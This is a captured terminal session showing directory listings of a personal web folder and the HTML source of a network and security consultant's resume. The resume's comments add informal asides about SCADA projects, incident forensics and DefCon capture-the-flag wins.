-rw-r--r--    1 thalakan  thalakan     12330 Oct 11  2003 md5.js
-rw-r--r--    1 thalakan  thalakan     12395 Jan 24  2002 md5.js~
-rwxr-xr-x    1 thalakan  thalakan     92160 Jan 24  2002 me.avi
-rw-r--r--    1 thalakan  thalakan     19894 Jan 24  2002 me.jpg
-rw-r--r--    1 thalakan  thalakan     19894 Oct 13  2002 me2.jpg
-rw-r--r--    1 thalakan  thalakan      3526 Aug  9  2004 menus.html
drwxr-xr-x    5 thalakan  thalakan       512 Jan 28  2004 ming-fonts-1.00
-rw-r--r--    1 thalakan  thalakan    498258 Jan 28  2004 ming-fonts-1.00.tar.bz2
-rw-r--r--    1 thalakan  thalakan       775 Aug  9  2004 mission.html
-rwxr-xr-x    1 thalakan  thalakan      2790 Mar 11  2002 mkboot.sh
-rw-r--r--    1 thalakan  thalakan      7380 Aug  9  2004 mklinux-notes.html
-rw-r--r--    1 thalakan  thalakan      1847 Aug 30  2004 moblog.php
-rw-r--r--    1 thalakan  thalakan      1557 Aug 30  2004 moblog.php~
-rw-r--r--    1 thalakan  thalakan      1106 Jun  3  2003 monkeys.c
-rw-------    1 thalakan  thalakan    419552 Jul 30  2003 mookie
-rw-r--r--    1 thalakan  thalakan      2789 Aug  9  2004 movies.html
-rw-r--r--    1 thalakan  thalakan       504 Oct 12  2003 movies.html~
lrwxr-xr-x    1 thalakan  thalakan         6 Jul  2  2002 mp3 -> ../mp3
-rw-r--r--    1 thalakan  thalakan    310397 Jan 12  2004 msrdp.cab
-rwxr-xr-x    1 thalakan  thalakan       542 Jan 24  2002 new-page.pl
-rw-------    1 thalakan  thalakan         0 Jan 15  2004 nohup.out
-rw-r--r--    1 thalakan  thalakan      3861 Aug  9  2004 notes.html
-rw-r--r--    1 thalakan  thalakan      2789 Aug  9  2004 novell-and-linux.html
-rw-r--r--    1 thalakan  thalakan      1920 Aug 28  2008 npo.php
-rw-r--r--    1 thalakan  thalakan      2084 Feb 22  2007 npo.php~
-rw-r--r--    1 thalakan  thalakan       132 Dec  3  2002 opendb.php
-rw-------    1 thalakan  thalakan       105 Jun 19  2002 opendb.php~
-rw-r--r--    1 thalakan  thalakan     19363 Jun 19  2002 opentelco.php
-rw-r--r--    1 thalakan  thalakan     19150 Jun 19  2002 opentelco.php~
-rw-------    1 thalakan  thalakan       423 Jun 19  2002 opentelco.sql
-rw-------    1 thalakan  thalakan       591 Jun 19  2002 opentelco.sql~
-rw-r--r--    1 thalakan  thalakan       342 Jan  1  2009 out
-rw-r--r--    1 thalakan  thalakan     20651 Oct  1  2004 out1
-rwxr-xr-x    1 thalakan  thalakan       734 Aug  9  2004 page.html
-rw-r--r--    1 thalakan  thalakan       222 Jan 28 01:04 paybycard.html
-rw-r--r--    1 thalakan  thalakan       189 Jan 28 01:00 paybycard.html~
-rw-r--r--    1 thalakan  thalakan      1387 Jan 28 02:18 paybycard.js
-rw-r--r--    1 thalakan  thalakan       165 Jan 28 01:02 paybycard.js~
-rw-r--r--    1 thalakan  thalakan    113526 Feb  7 20:00 pbcdummy.swf
-rw-r--r--    1 thalakan  thalakan      2566 Feb  9 18:15 pbctest.html
-rw-r--r--    1 thalakan  thalakan       252 Feb  7 19:13 pbctest.html~
-rwxr-xr-x    1 thalakan  thalakan       889 Dec  3  2002 perf.c
-rwxr-xr-x    1 thalakan  thalakan     25112 Jun  3  2003 perf.exe
-rw-r--r--    1 thalakan  thalakan      7594 Jan 24  2002 picobsd-notes.html
-rw-r--r--    1 thalakan  thalakan   2473331 Jul 30  2003 pics.tar.gz
drwxr-xr-x    3 thalakan  thalakan       512 Jan 24  2002 pingx
-rw-r--r--    1 thalakan  thalakan      9437 Jan 24  2002 pingx-1.0.tar.bz2
-rw-r--r--    1 thalakan  thalakan     10193 Jan 24  2002 pingx-1.0.tar.gz
-rw-r--r--    1 thalakan  thalakan       299 Nov  7  2008 places.txt
-rwxr-xr-x    1 thalakan  thalakan      6917 Mar  2 21:52 portability
-rwxr-xr-x    1 thalakan  thalakan      4208 Apr  4 17:07 portability.c
-rw-r--r--    1 thalakan  thalakan      8987 Aug  9  2004 process-title-notes.html
-rw-r--r--    1 thalakan  thalakan    456208 Apr  5  2005 procexp.exe
-rw-r--r--    1 thalakan  thalakan        84 Aug 15  2006 pvtg.php~
-rw-r--r--    1 thalakan  thalakan     81117 Apr 25 14:15 quotes.html
-rw-rw-r--    1 thalakan  thalakan       318 Mar  8  2004 rE2StLZ7Z4mo0e6l+wWntA==~
-rwxr-xr-x    1 thalakan  thalakan      4487 Jan 15  2004 rand
-rw-r--r--    1 thalakan  thalakan       102 Jan 15  2004 rand.c
-rw-r--r--    1 thalakan  thalakan      4959 Aug  9  2004 red-planet.html
-rw-r--r--    1 thalakan  thalakan      3673 Aug  9  2004 redhatman.html
-rw-r--r--    1 thalakan  thalakan       219 Apr 20  2004 refresh.html
-rw-r--r--    1 thalakan  thalakan     17923 Oct 28  2006 resume-onhold.html~
-rw-r--r--    1 thalakan  thalakan     19798 Nov 12  2007 resume-programmer.html
-rw-r--r--    1 thalakan  thalakan     19747 Oct 18  2007 resume-programmer.html~
-rw-r--r--    1 thalakan  thalakan     12169 Jul 16  2007 resume-sysadmin.html
-rw-r--r--    1 thalakan  thalakan     16468 Apr  4 16:49 resume.html
-rw-r--r--    1 thalakan  thalakan     12855 Mar 18  2003 resume.html.bak
-rw-r--r--    1 thalakan  thalakan     10340 Apr 27  2006 resume.txt
-rw-r--r--    1 thalakan  thalakan      8045 Mar 18  2003 resumenew.html
-rwxr-xr-x    1 thalakan  thalakan      3483 Jun 22  2002 rhsysv-skeleton
-rw-r--r--    1 thalakan  thalakan      6827 Dec 14  2003 rip1.c
drwxr-xr-x    3 thalakan  thalakan      1024 Jul 26  2006 rover
-rw-r--r--    1 thalakan  thalakan  14692587 Sep 13  2003 satisfaction.mov
-rw-r--r--    1 thalakan  thalakan       677 Apr 20  2004 script.html
-rw-r--r--    1 thalakan  thalakan       553 Apr 20  2004 script.html~
-rw-r--r--    1 thalakan  thalakan      1572 Aug  9  2004 seraph.html
-rw-r--r--    1 thalakan  thalakan     20397 Jan 18  2003 serif.fdb
-rw-r--r--    1 thalakan  thalakan      1034 Aug  9  2004 sgihw-notes.html
-rw-r--r--    1 thalakan  thalakan      5752 Feb 15  2007 sha1.js
-rw-r--r--    1 thalakan  thalakan      5499 Aug  9  2004 site-index.html
drwxr-xr-x    2 thalakan  thalakan      1024 Nov 13  2005 six
-rw-r--r--    1 thalakan  thalakan      7684 Aug  9  2004 skydiving.html
-rw-r--r--    1 thalakan  thalakan      1477 Feb 10  2004 snprintf.html
-rw-r--r--    1 thalakan  thalakan       518 Feb 10  2004 snprintf.html~
-rw-r--r--    1 thalakan  thalakan     18339 Jan 24  2002 socket-notes.html
-rw-r--r--    1 thalakan  thalakan      1247 Jan 24  2002 socket_types.c
-rw-r--r--    1 thalakan  thalakan      6295 Aug  9  2004 solaris.html
-rw-r--r--    1 www       thalakan        27 Nov  8  2008 soopha
-rw-r--r--    1 thalakan  thalakan      8883 Feb 22  2007 soopha.bak
-rw-r--r--    1 thalakan  thalakan     11901 Aug 28  2008 soopha1
-rw-r--r--    1 thalakan  thalakan     12154 Sep 26  2008 soopha1.html
-rw-rw-r--    1 thalakan  thalakan      7741 Dec  4  2004 soopha~
-rw-r--r--    1 thalakan  thalakan       557 Aug  9  2004 ssh-vpn-notes.html
-rw-r--r--    1 thalakan  thalakan     18610 Jun  3  2005 stage3
-rw-r--r--    1 thalakan  thalakan     13288 Jun  3  2005 stage3.exe
drwxr-xr-x    3 thalakan  thalakan      1536 Apr  9  2006 std36
-rw-r--r--    1 thalakan  thalakan     14027 Oct  9  2007 stod.zip.torrent
-rw-r--r--    1 thalakan  thalakan      1038 Jun 19  2002 submit-endpoint-form.html
-rw-r--r--    1 thalakan  thalakan       820 Jun 19  2002 submit-endpoint-form.html~
-rw-r--r--    1 thalakan  thalakan      1454 Jun 19  2002 submit-endpoint.php
-rw-r--r--    1 thalakan  thalakan       431 Jun 19  2002 submit-endpoint.php~
-rwxr--r--    1 thalakan  thalakan      1832 Jun 22  2002 susesysv-skeleton
-rwxr--r--    1 thalakan  thalakan      1601 Jun 22  2002 susesysv-skeleton~
-rw-r--r--    1 thalakan  thalakan       166 Jan 15  2004 t
-rw-r--r--    1 thalakan  thalakan     11264 Jan 24  2002 taxstuff.sdw
drwxr-xr-x    4 thalakan  thalakan       512 Jun  1  2002 template
-rw-r--r--    1 thalakan  thalakan      1476 Jan 24  2002 template-0.1.tar.gz
-rw-r--r--    1 thalakan  thalakan       481 Aug  9  2004 template.html
-rwxr-xr-x    1 thalakan  thalakan       780 Dec 19  2002 template.pl
-rw-r--r--    1 thalakan  thalakan   1048576 Dec 24  2007 test
-rw-r--r--    1 thalakan  thalakan        27 Nov 24  2004 test.dat
-rw-r--r--    1 thalakan  thalakan        20 Nov 24  2004 test.dat~
-rw-r--r--    1 thalakan  thalakan       593 Jan 24  2002 test.html~
-rw-r--r--    1 thalakan  thalakan      1391 Oct 11  2003 test.js~
-rw-r--r--    1 thalakan  thalakan        84 Sep  6  2004 test.php
-rw-r--r--    1 thalakan  thalakan        94 Sep  4  2004 test.php~
-rw-r--r--    1 thalakan  thalakan      7764 May 19  2005 test.png
-rw-r--r--    1 thalakan  thalakan       190 Jan 24  2002 test.tmpl
-rw-r--r--    1 thalakan  thalakan        20 Jan 15  2004 test.txt;2
-rw-r--r--    1 thalakan  thalakan      2159 Dec 10  2004 test2.html
-rw-r--r--    1 thalakan  thalakan       495 Dec 10  2004 test2.html~
-rw-r--r--    1 thalakan  thalakan       544 Nov 24  2004 test2.php
-rw-r--r--    1 thalakan  thalakan       544 Nov 24  2004 test2.php~
-rw-r--r--    1 thalakan  thalakan       971 Nov 24  2004 test3.php
-rw-r--r--    1 thalakan  thalakan       961 Nov 24  2004 test3.php~
-rw-r--r--    1 thalakan  thalakan      1340 Feb 23  2005 test4.html
-rw-r--r--    1 thalakan  thalakan       275 Feb 23  2005 test4.html~
-rw-r--r--    1 thalakan  thalakan       533 Jan 14  2009 test4.php.disabled
-rw-r--r--    1 thalakan  thalakan      1287 Apr 18  2007 test5.html
-rw-r--r--    1 thalakan  thalakan       669 Apr 18  2007 test5.html~
-rw-r--r--    1 thalakan  thalakan       465 Aug 18  2008 test6.html
-rw-r--r--    1 thalakan  thalakan     27781 Aug 28  2002 tester.html
-rw-r--r--    1 thalakan  thalakan       640 Apr 25  2007 testxml.php
-rw-r--r--    1 thalakan  thalakan       321 Dec 10  2004 testxml.php~
-rw-r--r--    1 thalakan  thalakan      2302 Dec  3  2002 threadtest.c
-rw-r--r--    1 thalakan  thalakan      1443 May 26 12:35 timeline.html
-rw-r--r--    1 thalakan  thalakan       182 Jan 27 17:50 timeline.html~
-rw-r--r--    1 thalakan  thalakan       151 Oct 23  2004 unhide.c
-rw-r--r--    1 thalakan  thalakan    183925 Jul 19 18:06 urls.txt
drwxr-xr-x    2 thalakan  thalakan      9216 Sep  1  2007 usage
-rwxr-xr-x    1 thalakan  thalakan      1605 Dec  9  2002 vinumprep.sh
-rw-r--r--    1 thalakan  thalakan      3248 Aug 11  2003 virtualtest1.cpp
-rw-r--r--    1 thalakan  thalakan       946 Aug 11  2003 visio-autoexport.vb
-rw-r--r--    1 thalakan  thalakan    233472 Dec  1  2004 vncviewer.exe
-rwxr-xr-x    1 thalakan  thalakan      1854 Sep 24  2002 vtxwatch.pl
-rw-r--r--    1 thalakan  thalakan       869 Jan 24  2002 w32logs.pl
-rw-r--r--    1 thalakan  thalakan      1183 Jan 24  2002 w32odbctest.pl
-rw-r--r--    1 thalakan  thalakan       590 Aug  9  2004 web.css
-rw-r--r--    1 thalakan  thalakan       407 Aug  9  2004 webcam.html
-rw-r--r--    1 thalakan  thalakan       580 Sep 19  2002 whereami.php
-rw-r--r--    1 thalakan  thalakan      2927 Aug  9  2004 why-not-open.html
-rw-r--r--    1 thalakan  thalakan      9644 Jan 12  2004 win2000l.gif
-rw-r--r--    1 thalakan  thalakan      1958 Jan 12  2004 win2000r.gif
-rw-r--r--    1 thalakan  thalakan    486190 Jan 23  2004 winamp_lite.cab
-rw-r--r--    1 thalakan  thalakan       204 Jan 23  2004 winamp_lite.html
drwxr-xr-x    2 thalakan  thalakan      1536 Feb  8 16:56 winbin
-rw-r--r--    1 thalakan  thalakan      3511 Jul  3  2002 winner.spec
-rwxr-xr-x    1 thalakan  thalakan      2669 Dec  3  2002 wintemplate.c
-rwxr-xr-x    1 thalakan  thalakan     12997 Aug  9  2004 work-introduction.html
-rw-r--r--    1 thalakan  thalakan       857 Jan 15  2004 wow.bin
-rw-r--r--    1 thalakan  thalakan  11565048 Dec  4  2008 wtf
$ ls -la | grep -v 20
total 169266
-rw-r--r--    1 thalakan  thalakan       223 Jan 28 01:04 #paybycard.html#
drwxrwxr-x   25 thalakan  thalakan      8192 Apr 25 14:17 .
-rw-r--r--    1 thalakan  thalakan      8321 Feb  7 19:51 AC_RunActiveContent.js
drwxr-xr-x    2 thalakan  thalakan       512 Apr 25 14:17 CVS
-rw-r--r--    1 thalakan  thalakan       454 Feb  9 19:05 camera.swf
-rw-r--r--    1 thalakan  thalakan      1227 Feb  9 18:12 cctest.swf
-rw-r--r--    1 thalakan  thalakan     95077 May 26 12:34 fileindex.xml
-rw-r--r--    1 thalakan  thalakan   4111068 Jan 27 18:26 fileindex.xml~
-rwxr-xr-x    1 thalakan  thalakan      3152 Apr  4 16:49 howmuch.pl
drwxr-xr-x   13 thalakan  thalakan      6656 Jun  4 05:40 images
-rw-r--r--    1 thalakan  thalakan       222 Jan 28 01:04 paybycard.html
-rw-r--r--    1 thalakan  thalakan       189 Jan 28 01:00 paybycard.html~
-rw-r--r--    1 thalakan  thalakan      1387 Jan 28 02:18 paybycard.js
-rw-r--r--    1 thalakan  thalakan       165 Jan 28 01:02 paybycard.js~
-rw-r--r--    1 thalakan  thalakan      2566 Feb  9 18:15 pbctest.html
-rw-r--r--    1 thalakan  thalakan       252 Feb  7 19:13 pbctest.html~
-rwxr-xr-x    1 thalakan  thalakan      6917 Mar  2 21:52 portability
-rw-r--r--    1 thalakan  thalakan     81117 Apr 25 14:15 quotes.html
-rw-r--r--    1 thalakan  thalakan     16468 Apr  4 16:49 resume.html
-rw-r--r--    1 thalakan  thalakan      1443 May 26 12:35 timeline.html
-rw-r--r--    1 thalakan  thalakan       182 Jan 27 17:50 timeline.html~
-rw-r--r--    1 thalakan  thalakan    183925 Jul 19 18:06 urls.txt
drwxr-xr-x    2 thalakan  thalakan      1536 Feb  8 16:56 winbin
$ cat resume.html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
<!-- Description: Information about my technical abilities, and places I've worked. -->
<HTML>
<HEAD>
	<TITLE>Jason's Resume</TITLE>
</HEAD>
<BODY bgcolor="#ffffff">

<!-- 
You're going to see comments like this throughout.  I assume that
if you can see them, you're a bright engineer type and can infer the
"real story" from the rest of the management speak and buzzwords in
here. 
-->

<P>Jason Spence 
</P>
<P>jspence@lightconsulting.com <BR>(650) 380-1430
</P>
<P>If you received this document on paper, you may want to look
at the most up-to-date version of this document, located at: <A
HREF="http://lightconsulting.com/~thalakan/resume.html">http://lightconsulting.com/~thalakan/resume.html</A>.

<BR> 
</P>

<!-- 
I actually believe in this; it's not just smoke.  If nothing else, the
Internet has proved that open dialogue between people of different
cultures reduces misconceptions and silly myths about each other.
It's hard to get pissed off at a people that produces the same kind of
news stories you are used to seeing in your local newspaper, because
it proves they're human and they screw things up and do neat things
just like yours does.

Amateur radio operators have known this for years, but now that all
the kids are playing video games with people halfway across the globe
on a regular basis, it's far more apparent.
-->

<H1>Goal</H1> 
<P>To use my abilities to help individuals and organizations to
communicate without boundaries, and without borders.  To help provide
reliable and trustworthy communications systems by building security
and robustness into the things I touch.  It is my goal to provide
secure, ubiquitous access to communications technology for all.
</P>
<H1>Objectives</H1>
<UL>
        <LI><P>To apply best principles to the deployment and
	management of networks, and to assist the system and network
	administrator communities to develop the zero-administration
	environment we all want.
	<LI><P>To use my skills to leave the networks I touch smarter,
	faster, and easier to understand than when I started working
	with them.

<!--
I've already started on this.  See 
http://lightconsulting.com/~thalakan/drop/hd2.exe
-->

	<LI><P>To release one truly great network infrastructure
	software component to the Internet networking community.
</UL>
<H1>Experience</H1>

<TABLE WIDTH=100% CELLPADDING=2 CELLSPACING=2>
	<TR>
		<TH WIDTH=33%>
			<P ALIGN=LEFT>2003-Present</P>
		</TH>
		<TH WIDTH=33%>
			<P ALIGN=CENTER>HSQ, Inc.</P>
		</TH>
		<TH WIDTH=33%>
			<P ALIGN=RIGHT>Hayward, CA</P>
		</TH>
	</TR>
</TABLE>
<H2>Technical Consultant</H2>
<UL>

        <LI><P>Wrote the Win32 version of the MISER watchdog
        application supervision component.

<!--
Yeah, and it had to plug into 5 other nets under other administrative
domains, and EIGRP wouldn't work right over the async ports in 12.2
mainline, the (T) version was unstable, I had to set up IIS on a 2k3
server to FTP core dumps to, I had to enable RIP listeners on XP and
VMS hosts, deal with EIGRP domain conflicts with the peer nets,
somehow get a bunch of microcontroller based serial to ethernet
bridges to do dynamic addressing, arrrrrrrgh.  I actually had to write
a RIP protocol analyzer from scratch at one point to figure out what
the hell was going on:

http://lightconsulting.com/~thalakan/rip1.c

And then I find out that the RIP listener component is unsupported on
non server-class operating systems from Microsoft.  Oh, well.  I ended
up reverse engineering iprip.dll to get the registry keys so I could
tweak the failover timers into compliance with requirements, which
ended up working very well.
-->
        <LI><P>Designed and implemented a fully redundant Cisco based
        network core and associated management infrastructure for the
        light rail system being built at Hiawatha, MN.  TTFC was 21
        days, and TTS was 26 days.

	<LI><P>Ported the MISER ODBC bridge to the Win32 SCM
	("service") API and other "native" APIs to satisfy reliability
	and customer ease-of-use requirements.

<!-- 

This was perhaps the world's most expensive connect-the-dots program.
Basically, someone forgot to include power sensors in the
specification, so the system had no idea whether a given track section
was powered or not.  But we wired it up so the points so that people
on the track could hit switches and report their current state to the
operator, who would then tell the system what the switch state was.
Problem was that MISER, like many other SCADA systems, had no idea
what points were connected to what other points, so I had to layer a
bunch of data on top of that so the MISER processors could induce the
overall power states based on the states of individual switches.

I'm going to submit a JSR to Sun at some point because the Java based
graph (CS, not bars-and-pies) editing program I wrote had to implement
a custom JComponent to represent a node, and that was way more
complicated than it should have been.  And the fact that they only got
focus working correctly just recently in 1.4 and Netbeans takes
something ridiculous like 110 RSS and 150 total VM size didn't help at
all.

-->
	<LI><P>Built graph algorithm libraries and tools to provide
	MISER with knowledge of system point topology and
	interconnections.

	<LI><P>Currently porting 100 kSLOC of industrial controller
	code to Windows CE.

</UL>

<!--
A bunch of people got broken into and I had to figure out what
happened, what data was stolen, how to fix it, do process engineering
to keep it from happening again, etc.  One site had something like
several gigs of German warez and screeners on it because the
administrator had enabled public writable FTP access.  You should have
seen the bandwidth graphs and the associated bill for them!  
-->

<TABLE WIDTH=100% CELLPADDING=2 CELLSPACING=2>
	<TR>
		<TH WIDTH=33%>
			<P ALIGN=LEFT>2002-Present</P>
		</TH>
		<TH WIDTH=33%>
			<P ALIGN=CENTER>Protectix, Inc.</P>
		</TH>
		<TH WIDTH=33%>
			<P ALIGN=RIGHT>Santa Clara, CA</P>
		</TH>
	</TR>
</TABLE>
<H2>Technical Consultant</H2>
<UL>

        <LI><P>Performed remote forensic analysis of compromised
	Windows servers and acted as liason between customers and
	Federal law enforcement.

        <LI><P>Performed on-site policy re-engineering consulting with
        customers.

</UL>

<!--
One thing I didn't put on here was that I wrote an, um, "adult
entertainment" IVR system for one contract.  On a Sun SparcStation 20,
no less.  Doing custom IVR is harder than it sounds because of the load
issues, customer inexperience with using unambigious language, old
hardware, and so forth.
-->

<TABLE WIDTH=100% CELLPADDING=2 CELLSPACING=2>
	<TR>
		<TH WIDTH=33%>
			<P ALIGN=LEFT>2001-Present</P>
		</TH>
		<TH WIDTH=33%>
			<P ALIGN=CENTER>Open Source Telecom</P>
		</TH>
		<TH WIDTH=33%>
			<P ALIGN=RIGHT>Sunnyvale, CA</P>
		</TH>
	</TR>
</TABLE>
<H2>Technical Consultant</H2>
<UL>
        <LI><P>Re-engineered server shipping process, saving
	approximately 1 day of engineering time per server and
	significantly increasing average margin per server.
	<LI><P>Wrote custom IVR systems using a combination of Perl
	and ccscript on the GNU Bayonne platform.  Responsible for
	factoring out common code segments into re-usable libraries.
	Reduced average time to feature complete from weeks to days.
	</P>
	<LI><P>Wrote Caller ID and port bridging drivers for Bayonne's
	Voicetronix driver.  Worked with Voicetronix to resolve
	several bugs, including hybrid balance codec issues.
	</P>
</UL>

<!--
See http://lightconsulting.com/~thalakan/frys-notes.html for the real
story behind the web server.
-->
<TABLE WIDTH=100% CELLPADDING=2 CELLSPACING=2>
	<TR>
		<TH WIDTH=33%>
			<P ALIGN=LEFT>1999-Present</P>
		</TH>
		<TH WIDTH=33%>
			<P ALIGN=CENTER>Fry's Electronics, ISP Department</P>
		</TH>
		<TH WIDTH=33%>
			<P ALIGN=RIGHT>San Jose, CA</P>
		</TH>
	</TR>
</TABLE>
<H2>Technical Consultant</H2>
<UL>
	<LI><P STYLE="margin-bottom: 0in">Designed and implemented all
	the hardware and network infrastructure that runs
	www.frys.com.  Project came in 50% under budget and has been
	secure for 2+ years.
	</P>
	<LI><P STYLE="margin-bottom: 0in">Implemented an 800-port RAS
	solution with three hardware vendors and open source software.
	<LI><P>Responsible for installing and maintaining equipment
	and software to provide dial-up, mail, RADIUS, customer web
	hosting, and infrastructure services for ISP products.
	<LI><P>Participated in the development of <A
	href="http://www.sisd.com/freeside/">Freeside</A>, an
	open-source billing and ISP administration package.  Acted as
	developer liason between the Freeside community and Fry's
	management to produce patches which met the needs of both
	groups.
	</P>
</UL>

<!--
Working with the IT people here has taught me the trick of infinite
patience.  I can now laugh off any insanity I have to deal with as a
network administrator at any site because I know that no matter how
bad it gets, it can't ever get any worse than dealing with a hoarde of
CS students who are Out To Get You.
-->
<H1>Education</H1>
<TABLE WIDTH=100% CELLPADDING=2 CELLSPACING=2>
	<TR>
		<TH WIDTH=33%>
			<P ALIGN=LEFT>2000-Present</P>
		</TH>
		<TH WIDTH=33%>
			<P ALIGN=CENTER>Ohlone Community College</P>
		</TH>
		<TH WIDTH=33%>
			<P ALIGN=RIGHT>Fremont, CA</P>
		</TH>
	</TR>
</TABLE>
<UL>

        <LI><P>Completed requirements for Computer Science AS degree.
	Currently completing requirements for transfer admission to UC
	Berkeley's EECS program.  4.0 average GPA in major courses;
	average GPA for Ohlone's AS program is about 3.0.  Training
	includes formal data structures, formal logic, multivariate
	calculus (with CS applications), linear algebra (with CS
	applications), and formal abstract analysis.
	</P>
</UL>

<TABLE WIDTH=100% CELLPADDING=2 CELLSPACING=2>
	<TR>
		<TH WIDTH=33%>
			<P ALIGN=LEFT>1999-2000</P>
		</TH>
		<TH WIDTH=33%>
			<P ALIGN=CENTER>College of San Mateo</P>
		</TH>
		<TH WIDTH=33%>
			<P ALIGN=RIGHT>San Mateo, CA</P>
		</TH>
	</TR>
</TABLE>
<UL>
	<LI><P>Attended courses in real estate management for personal
	investment purposes. 
	</P>
</UL>
<H1>Skills</H1>

<H2>Communications</H2>
<p>
I've given several presentations at information security conferences
on a wide variety of topics that have come up in the course of my
work.  I plan to be speaking throughout 2005 at conferences on topics
such as SCADA system attack and defense and network visualization.
Slides, videos, and abstracts are available upon request.

<p>
I score in the top 5 percentile on standardized English reading and
writing placement tests, and a perfect score on the standardized ASSET
writing examination.

<p>
I regularly catch corner-case errors in MSDN documentation when doing
development on Microsoft platforms, and have attended Microsoft
gatherings to help improve the overall quality of their documentation.

<p>
I am a native English speaker with a Northern California accent and a
Montessori based developmental language education.

<H2>Languages</H2>

<!-- 
If you got the INTERCAL joke, you win a prize :) By the way, the COBOL
isn't a joke.  I actually do some stuff with TinyCobol because, well,
it doesn't suck for certain types of work, like financial reports.
It's a hell of a lot smaller than whatever I could come up with in C,
and unlike the Perl version, I can go deploy it on a mainframe if I
need~ to :)
-->
<ul>
<li>> 1000 billed hours: ANSI/ISO C, C++.
<li>> 100 billed hours: Java, Perl, UNIX shell scripting (Bourne and csh).
<li>> 10 billed hours: DEC FORTRAN, GNU FORTRAN, VMS DCL, Intel
assembly (including supervisor instructions and vector instructions),
ccscript, autotools, GNU and BSD make.
<li>Self-taught: NT command shell scripting, VBScript / JScript
windows scripting hosts, C#, COBOL, INTERCAL, AppleScript, elisp, flex,
bison, and a few dozen domain-specific languages.
<li>Development Environments: Visual C++ 6.0, Visual Studio .NET, GNU
toolchain using emacs and vim, Compaq Visual Fortran, VMS toolchain
using EDT and DCL based tools.
</ul>
</P>

<H2>Network Platforms</H2> 

<P>I can bring the following systems into compliance with site
security policies: Windows NT (2000, XP), Linux, FreeBSD, OpenBSD,
Solaris.  I have billed more than 5000 hours on Linux related work,
and more than 1000 hours on Windows and FreeBSD related work.

I am familiar enough with the code to customize the following packages
at the source level or by using vendor-provided plugin APIs: GCC, GTK,
Javadoc, ISC BIND, snort, Sendmail, Qmail, Apache, various
Windows subsystems, and OpenNMS.
</P>

<H2>Network Protocols / Hardware</H2>

<p>
I've worked with the following packet filtering, monitoring and/or
firewalling tools: Linux 2.4 iptables SPF, Linux 2.2 ipchains, BSD
ipfw, IPFilter, OpenBSD pf, libpcap, libnet, Ethereal, libnids,
Windows NDIS intermediate drivers, Windows NDIS filter drivers, OS X
I/O Kit filters, VMS UCX ACLs.

<!-- 
There's something like three dozen other things that should be on
here, but this resume is long enough as it is :P I actually had a
"network hardware" section in here, but that actually did have several
dozen entries and I don't think anyone cares that I deployed a bunch
of Alcatel stuff or patched their broken MIBS to work with Net-SNMP,
or basically did all the Linux Beta QA on the Digi RASFires, etc.

I really did write protocol libraries for a bunch of this stuff, like
BGP, a UDP/IP library, NMB name decoders, SMTP clients, etc.  Some of
it's even open, so I can use it for whatever project you have in mind
for me.
-->

<P>I have worked with and/or written protocol libraries for the
following platforms: Internet Protocol v4 and v6, Ethernet, the H.323
family of videoconferencing protocols, BGP 4+, EIGRP (Cisco), RIP,
DNS, LDAP, SNMP, HTTP, FTP, IP Multicast, Berkeley UNIX sockets,
Winsock 2, Linux 2.4 bridging, AX.25 amateur packet, SMB (windows
networking), NFS, NTP, the Intel PXE family of network boot tools,
bpbatch, NMB (windows networking name services), PPTP, Token ring,
various LAN ATM flavors, PPP (+IPCP, CCP, BridgeCP, and other extensions). 

</P>
<H2>Titles</H2>
<p>
I regularly compete against other network security groups in contests
designed to test the speed, agility, and knowledge of the teams
playing.  I hold the following titles as a result of these
competitions:

<p>
DefCon 9, Las Vegas, NV: Co-won first place<br>
DefCon 10, Las Vegas, NV: First place<br>
Interz0ne II, Atlanta, GA: First place<br>
Interz0ne III, Atlanta, GA: Second place<br>
t00rcon 2003, San Diego, CA: Second place<br>
t00rcon 2004, San Diego, CA: Second place<br>
Interz0ne IV, Atlanta, GA: First place<br>


<H2>Other</H2>
<UL>
<!--
This is Dan Kaminsky's network toolkit; you may have heard of it.
Among other things, it has what we think is the world's fastest port
scanner.  At least, no one has contested our claim... 
-->
        <LI><P>I am the primary build engineer for Paketto Keiretsu.
	<LI><P>Can type over 100 wpm on both QWERTY and Dvorak
	keyboards.
	<LI><P>I participated in the DefCon Capture the Flag
	competition during DefCon 9 and 10 and assisted the <A
	href="http://www.digrev.org/">Digital Relevation</A> team in
	winning first place both years.  Wrote several attack and
	defense tools in C, Perl, Bourne shell, and C# under pressure,
	with an approximate output of 2 debugged lines of C per
	minute.
	<LI><P>My lifetime code output in all languages has been
	independently estimated to be approximately 150,000 lines as
	of 2003, with a 1:5 documentation to code ratio.
	<LI><P>Hold an Technican-class amateur radio license (callsign
	KF6RGF) and participate in the local emergency services net.
<!-- 
Does anyone not do this anymore?  I swear, it takes a couple hours a
day of reading and study just to keep up with the industry.
-->
	<li><p>I'm maintain a strict policy of continuing
	self-education in both my personal and business roles.
<!-- 
I think all infosec people should run big personal networks.  It's
great: I don't need to collect exploits, the bad guys just dump theirs
on my honeypots :)
-->
	<li><p>My personal research network (14 nodes located
	nationally and internationally) has never been been
	compromised in violation of the security policy by either
	anonymous or guest "white-hat" hackers.
</UL>
<P ALIGN=CENTER><FONT SIZE=1>References available on request.</FONT></P>
<P><BR><BR>
</P>
</BODY>
</HTML>$ ls -la | grep -v 20
total 169266
-rw-r--r--    1 thalakan  thalakan       223 Jan 28 01:04 #paybycard.html#
drwxrwxr-x   25 thalakan  thalakan      8192 Apr 25 14:17 .
-rw-r--r--    1 thalakan  thalakan      8321 Feb  7 19:51 AC_RunActiveContent.js
drwxr-xr-x    2 thalakan  thalakan       512 Apr 25 14:17 CVS
-rw-r--r--    1 thalakan  thalakan       454 Feb  9 19:05 camera.swf
-rw-r--r--    1 thalakan  thalakan      1227 Feb  9 18:12 cctest.swf
-rw-r--r--    1 thalakan  thalakan     95077 May 26 12:34 fileindex.xml
-rw-r--r--    1 thalakan  thalakan   4111068 Jan 27 18:26 fileindex.xml~
-rwxr-xr-x    1 thalakan  thalakan      3152 Apr  4 16:49 howmuch.pl
drwxr-xr-x   13 thalakan  thalakan      6656 Jun  4 05:40 images
-rw-r--r--    1 thalakan  thalakan       222 Jan 28 01:04 paybycard.html
-rw-r--r--    1 thalakan  thalakan       189 Jan 28 01:00 paybycard.html~
-rw-r--r--    1 thalakan  thalakan      1387 Jan 28 02:18 paybycard.js
-rw-r--r--    1 thalakan  thalakan       165 Jan 28 01:02 paybycard.js~
-rw-r--r--    1 thalakan  thalakan      2566 Feb  9 18:15 pbctest.html
-rw-r--r--    1 thalakan  thalakan       252 Feb  7 19:13 pbctest.html~
